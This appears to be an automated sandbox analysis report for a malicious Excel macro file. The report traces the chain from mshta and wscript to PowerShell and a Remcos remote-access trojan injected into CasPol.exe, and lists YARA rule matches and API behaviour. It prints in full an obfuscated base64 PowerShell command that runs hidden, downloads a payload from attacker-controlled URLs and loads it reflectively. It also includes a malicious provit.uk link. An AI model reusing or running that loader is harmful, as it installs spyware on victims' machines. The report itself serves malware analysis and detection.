                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,34_2_004158B9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE89B000DD6_2_000007FE89B000DD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0041D07134_2_0041D071
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_004520D234_2_004520D2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0043D09834_2_0043D098
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0043715034_2_00437150
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_004361AA34_2_004361AA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0042625434_2_00426254
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0043137734_2_00431377
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0043651C34_2_0043651C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0041E5DF34_2_0041E5DF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0044C73934_2_0044C739
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_004367C634_2_004367C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_004267CB34_2_004267CB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0043C9DD34_2_0043C9DD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00432A4934_2_00432A49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00436A8D34_2_00436A8D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0043CC0C34_2_0043CC0C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00436D4834_2_00436D48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00434D2234_2_00434D22
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00426E7334_2_00426E73
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00440E2034_2_00440E20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0043CE3B34_2_0043CE3B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00412F4534_2_00412F45
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00452F0034_2_00452F00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00426FAD34_2_00426FAD
                    Source: pi-77159.xlsOLE indicator, VBA macros: true
                    Source: pi-77159.xlsStream path 'MBD00322250/\x1Ole' : https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lacedHGHt9#nBY=B02>UE;,1d7Kc*NEHaN%XT}fXu[mJLhZ&AzQpO-#:)K4nyJNPV06Wc8x5pybgZ01BKUfO9TgvA5l7w5NFcJh7jfHYCoIraLoYI0)rx{y]{wYXYgqw{"
                    Source: 38630000.0.drStream path 'MBD00322250/\x1Ole' : https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lacedHGHt9#nBY=B02>UE;,1d7Kc*NEHaN%XT}fXu[mJLhZ&AzQpO-#:)K4nyJNPV06Wc8x5pybgZ01BKUfO9TgvA5l7w5NFcJh7jfHYCoIraLoYI0)rx{y]{wYXYgqw{"
                    Source: ~DFC4030D08E8153FBD.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401F66 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004020E7 appears 39 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004338A5 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00433FB0 appears 55 times
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                    Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2069
                    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2362
                    Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2069
                    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2362
                    Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2069Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2362Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2069
                    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2362
                    Source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: Process Memory Space: powershell.exe PID: 1712, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: CasPol.exe PID: 1260, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winXLS@39/51@13/5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,34_2_00416AB7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,34_2_0040E219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,34_2_0041A63F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,34_2_00419BC4
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\38630000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-VCYBO3
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRB2BB.tmpJump to behavior
                    Source: pi-77159.xlsOLE indicator, Workbook stream: true
                    Source: PORTS SITUATION BULK CARRIERS.xlsx.0.drOLE indicator, Workbook stream: true
                    Source: 38630000.0.drOLE indicator, Workbook stream: true
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.s.......s.......o.......................o.......o......................3........................o.............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................s.....}..w......s......................1......(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................s.......s.....}..w.............................1......(.P..............3.......................-..............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................J..l....}..w.....-......\.......................(.P.....................8...............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................-......}..w............8)O........l......N.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................J..l....}..w.....-......\.......................(.P.....................8...............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................-......}..w............8)O........l......N.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.8)O........l......N.....(.P............................. .......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .d.E.v.I.C.e.C.r.e.d.E.n.t.I.a.l.d.e.p.L.o.Y.m.E.N.T.(.P.............................8.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.............................8.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................-......}..w............8)O........l......N.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...................F.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................-......}..w............8)O........l......N.....(.P.............................l.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........-......}..w............8)O........l......N.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...s.....}..w.............................1......(.P..............3......................p...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................s.....}..w......s......................1......(.P.....................................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.s.......s.....P~......................P~......X~.......................3......................P~..............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................s.....}..w......s......................1......(.P.............\.......................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................s.......s.....}..w.............................1......(.P..............3......................P...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................D0.l....}..w....P.......\.......................(.P.............\.......(...............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................P.......}..w............@._......3.l......^.....(.P.............\.......................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................D0.l....}..w....P.......\.......................(.P.............\.......(...............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................P.......}..w............@._......3.l......^.....(.P.............\.......................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.@._......3.l......^.....(.P.............\............... .......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .d.E.v.I.C.e.C.r.e.d.E.n.t.I.a.l.d.e.p.L.o.Y.m.E.N.T.(.P.............\...............8.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.............\...............8.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................P.......}..w............@._......3.l......^.....(.P.............\.......................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...\...............F.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................P.......}..w............@._......3.l......^.....(.P.............\...............l.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......P.......}..w............@._......3.l......^.....(.P.............\.......................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...s.....}..w.............................1......(.P..............3......................0...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................s.....}..w......s......................1......(.P.....................................................
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hosts
